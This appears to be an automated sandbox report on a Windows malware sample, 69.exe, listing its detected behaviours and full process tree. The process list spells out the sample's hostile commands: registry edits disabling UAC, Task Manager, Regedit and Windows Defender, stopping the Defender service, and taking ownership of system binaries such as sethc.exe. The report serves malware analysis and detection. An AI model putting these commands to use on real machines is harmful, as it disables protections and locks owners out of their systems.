Analysis Overview
SHA256
6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Threat Level: Known bad
The file 69.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Possible privilege escalation attempt
Stops running service(s)
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Loads dropped DLL
Modifies system executable filetype association
Modifies file permissions
Executes dropped EXE
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-21 19:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-21 19:07
Reported
2024-09-21 19:08
Platform
win7-20240729-en
Max time kernel
7s
Max time network
7s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\exec.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\reg.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\exec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\jumpscare.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Delays execution with timeout.exe
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: 33 | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69.exe
"C:\Users\Admin\AppData\Local\Temp\69.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
C:\PerfLogs\windows\exec.exe
"C:\PerfLogs\windows\exec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"
C:\PerfLogs\windows\jumpscare.exe
jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
rnbowspam.exe
C:\Windows\System32\takeown.exe
takeown /f taskmgr.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"
C:\Windows\System32\takeown.exe
takeown /f sethc.exe
C:\Windows\System32\icacls.exe
icacls "sethc.exe" /granted "Admin":F
C:\Program Files\Windows Media Player\wmplayer.exe
wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\System32\icacls.exe
icacls "taskmgr.exe" /granted "Admin":F
C:\Windows\System32\takeown.exe
takeown /f reg.exe
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\System32\icacls.exe
icacls "reg.exe" /granted "Admin":F
C:\Windows\system32\takeown.exe
takeown /f regedit.exe
C:\Windows\system32\icacls.exe
icacls "regedit.exe" /granted "Admin":F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\shutdown.exe
shutdown -r -t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
C:\PerfLogs\windows\warn.vbs
C:\PerfLogs\windows\exec.exe
C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat
C:\PerfLogs\windows\jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat
C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat
C:\PerfLogs\windows\rainbow.bat
C:\PerfLogs\windows\killrunas.vbs
C:\PerfLogs\windows\logon_overwrte.exe
C:\PerfLogs\windows\69rnspam.exe
C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt
C:\PerfLogs\windows\tape.mp4